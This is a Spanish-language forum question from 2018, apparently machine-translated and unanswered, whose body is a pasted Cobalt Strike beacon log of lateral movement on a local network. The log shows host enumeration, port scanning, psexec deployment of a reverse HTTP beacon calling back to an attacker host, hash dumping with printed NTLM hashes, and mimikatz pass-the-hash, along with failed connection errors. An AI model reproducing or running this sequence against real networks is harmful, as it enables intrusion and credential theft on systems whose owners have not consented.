Acerca del medidor pivotante [en espera]

0
[+] established link to parent beacon: 192.168.1.2

beacon> net view
[*] Tasked beacon to run net view
[+] host called home, sent: 76344 bytes
[+] received output:
List of hosts:


[+] received output:
 Server Name             IP Address                       Platform  Version  Type   Comment
 -----------             ----------                       --------  -------  ----   -------
 HEMA1                   192.168.1.5                      500       6.1             
 HEMA2                   192.168.1.6                      500       6.1             
 HEMA3                   192.168.1.13                     500       6.1             
 HEMA5                   192.168.1.2                      500       6.1             
 WTP-PC

              192.168.1.12                     500       6.1             

beacon> portscan 192.168.1.12 1-1024,3389,5900-6000 none 1024
[*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on 192.168.1.12
[+] host called home, sent: 75325 bytes
[+] received output:
192.168.1.12:139
192.168.1.12:135

[+] received output:
192.168.1.12:554
192.168.1.12:445
Scanner module is complete

beacon> psexec WTP-PC ADMIN$ http
[*] Tasked beacon to run windows/beacon_http/reverse_http (192.168.1.3:6666) on WTP-PC via Service Control Manager (\WTP-PC\ADMIN$99981.exe)
[+] host called home, sent: 14985 bytes
[-] could not upload file: 5
[-] Could not open service control manager on WTP-PC: 5
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 64069 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
wtp:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

beacon> rev2self
[*] Tasked beacon to revert token
beacon> pth HEMA5\Administrator 31d6cfe0d16ae931b73c59d7e0c089c0
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Administrator /domain:HEMA5 /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0 /run:"cmd.exe /c echo 1b932da7028 > \.\pipe\ca907f" command
beacon> psexec WTP-PC ADMIN$ smb
[*] Tasked beacon to run windows/beacon_smb/bind_pipe (\WTP-PC\pipe\status_7777) on WTP-PC via Service Control Manager (\WTP-PC\ADMIN$638e2.exe)
[+] host called home, sent: 679790 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[-] could not upload file: 1331
[-] Could not open service control manager on WTP-PC: 5
[-] Could not connect to pipe (\WTP-PC\pipe\status_7777): 1331
[-] could not connect to pipe: 1331
[+] received output:
user    : Administrator
domain  : HEMA5
program : cmd.exe /c echo 1b932da7028 > \.\pipe\ca907f
impers. : no
NTLM    : 31d6cfe0d16ae931b73c59d7e0c089c0
  |  PID  3184
  |  TID  2212
  |  LSA Process is now R/W
  |  LUID 0 ; 19179194 (00000000:0124a6ba)
  \_ msv1_0   - data copy @ 001C6B0C : OK !
  \_ kerberos - data copy @ 001A8628
   \_ aes256_hmac       -> null             
   \_ aes128_hmac       -> null             
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace -> null
    
pregunta Capo Dark 24.12.2018 - 18:03
fuente

0 respuestas

Lea otras preguntas en las etiquetas